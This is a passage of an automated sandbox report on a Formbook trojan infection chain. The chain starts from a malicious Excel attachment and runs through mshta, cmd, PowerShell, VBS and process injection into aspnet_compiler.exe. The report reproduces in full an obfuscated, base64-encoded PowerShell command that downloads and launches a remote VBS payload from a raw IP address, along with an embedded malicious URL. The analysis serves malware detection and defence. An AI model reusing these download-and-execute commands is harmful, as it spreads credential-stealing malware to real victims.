          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FBE8 NtQueryVirtualMemory,13_2_00A5FBE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FB50 NtCreateKey,13_2_00A5FB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FC90 NtUnmapViewOfSection,13_2_00A5FC90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FC30 NtOpenProcess,13_2_00A5FC30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FC60 NtMapViewOfSection,13_2_00A5FC60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FC48 NtSetInformationFile,13_2_00A5FC48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A61D80 NtSuspendThread,13_2_00A61D80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FD8C NtDelayExecution,13_2_00A5FD8C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FD5C NtEnumerateKey,13_2_00A5FD5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FEA0 NtReadVirtualMemory,13_2_00A5FEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FED0 NtAdjustPrivilegesToken,13_2_00A5FED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FE24 NtWriteVirtualMemory,13_2_00A5FE24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FFB4 NtCreateSection,13_2_00A5FFB4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FFFC NtCreateProcessEx,13_2_00A5FFFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FF34 NtQueueApcThread,13_2_00A5FF34
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A9352E7_2_000007FE89A9352E
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeCode function: 12_2_000007FE8B6574B112_2_000007FE8B6574B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040100013_2_00401000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040F80313_2_0040F803
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004160B313_2_004160B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040126013_2_00401260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040FA2313_2_0040FA23
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402ADD13_2_00402ADD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402AE013_2_00402AE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040DAA313_2_0040DAA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040234013_2_00402340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0042E33313_2_0042E333
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040233413_2_00402334
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402E7013_2_00402E70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040F7FA13_2_0040F7FA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A6E0C613_2_00A6E0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A6E2E913_2_00A6E2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B163BF13_2_00B163BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A963DB13_2_00A963DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A7230513_2_00A72305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00ABA37B13_2_00ABA37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AF443E13_2_00AF443E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AF05E313_2_00AF05E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A8C5F013_2_00A8C5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AB654013_2_00AB6540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A7468013_2_00A74680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A7E6C113_2_00A7E6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B1262213_2_00B12622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00ABA63413_2_00ABA634
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A7C7BC13_2_00A7C7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A9286D13_2_00A9286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A7C85C13_2_00A7C85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A729B213_2_00A729B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B1098E13_2_00B1098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B049F513_2_00B049F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A869FE13_2_00A869FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00ABC92013_2_00ABC920
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B1CBA413_2_00B1CBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AF6BCB13_2_00AF6BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B12C9C13_2_00B12C9C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AFAC5E13_2_00AFAC5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AA0D3B13_2_00AA0D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A7CD5B13_2_00A7CD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AA2E2F13_2_00AA2E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A8EE4C13_2_00A8EE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B0CFB113_2_00B0CFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AE2FDC13_2_00AE2FDC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A80F3F13_2_00A80F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A9D00513_2_00A9D005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AED06D13_2_00AED06D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A7304013_2_00A73040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A8905A13_2_00A8905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AFD13F13_2_00AFD13F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B1123813_2_00B11238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A6F3CF13_2_00A6F3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A7735313_2_00A77353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A8148913_2_00A81489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AA548513_2_00AA5485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AAD47D13_2_00AAD47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B135DA13_2_00B135DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A7351F13_2_00A7351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AF579A13_2_00AF579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AA57C313_2_00AA57C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B0771D13_2_00B0771D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B0F8EE13_2_00B0F8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AEF8C413_2_00AEF8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AF394B13_2_00AF394B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AF595513_2_00AF5955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B23A8313_2_00B23A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A6FBD713_2_00A6FBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AFDBDA13_2_00AFDBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A97B0013_2_00A97B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00B0FDDD13_2_00B0FDDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AFBF1413_2_00AFBF14
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A9DF7C13_2_00A9DF7C
          Source: PI#0034250924.xla.xlsxOLE indicator, VBA macros: true
          Source: PI#0034250924.xla.xlsxStream path 'MBd0019C635/\x1Ole' : https://og1.in/Ts9zje%kH2PtB@h']}kcoW8urgju7qSIyaY6rMfoRvqJjFI1MRxDhJ0cgZCOILDjTfxNUj50KG2ed9pKmaMFcHRLPB6jFvTt3m12GrIMTshxM4f1f2xwH0Kkfjk36FCfVkQuag2tuZ2peUDjVhwE8iqQxTFkHUBeJah92hLjWBFYZUL5ldm7b9N)BhA0<mXm'_
          Source: F7A30000.0.drStream path 'MBD0019C635/\x1Ole' : https://og1.in/Ts9zje%kH2PtB@h']}kcoW8urgju7qSIyaY6rMfoRvqJjFI1MRxDhJ0cgZCOILDjTfxNUj50KG2ed9pKmaMFcHRLPB6jFvTt3m12GrIMTshxM4f1f2xwH0Kkfjk36FCfVkQuag2tuZ2peUDjVhwE8iqQxTFkHUBeJah92hLjWBFYZUL5ldm7b9N)BhA0<mXm'_
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00A6DF5C appears 137 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00ADF970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AB3F92 appears 132 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AB373B appears 253 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00A6E2A8 appears 60 times
          Source: temp_exec.exe.11.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: temp_exec.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 12.2.temp_exec.exe.2bc9ae0.2.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
          Source: 12.2.temp_exec.exe.8e0000.0.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@16/21@2/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PI#0034250924.xla.xlsxJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeMutant created: NULL
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8E88.tmpJump to behavior
          Source: PI#0034250924.xla.xlsxOLE indicator, Workbook stream: true
          Source: F7A30000.0.drOLE indicator, Workbook stream: true
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w..............D.......D......1D.....(.P.......D......3D......................j~.............Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................K..l....}..w.....j~.....\.F.......D.............(.P..... .......(.......8...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................K..l....}..w.....j~.....\.F.......D.............(.P..... .......(.......8...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@0p........l....@.o.....(.P..... .......(............... .......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P..... .......(...............8.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...(...............F.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(...............l.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................j~.............0.~':....Wl.....}..w....8.......@EE.....^...............(.P..... .......(.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................j~.................:....Wl.....}..w....8.......@EE.....^...............(.P..... .......(.......................................Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PI#0034250924.xla.xlsxReversingLabs: Detection: 18%
          Source: PI#0034250924.xla.xlsxVirustotal: Detection: 23%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
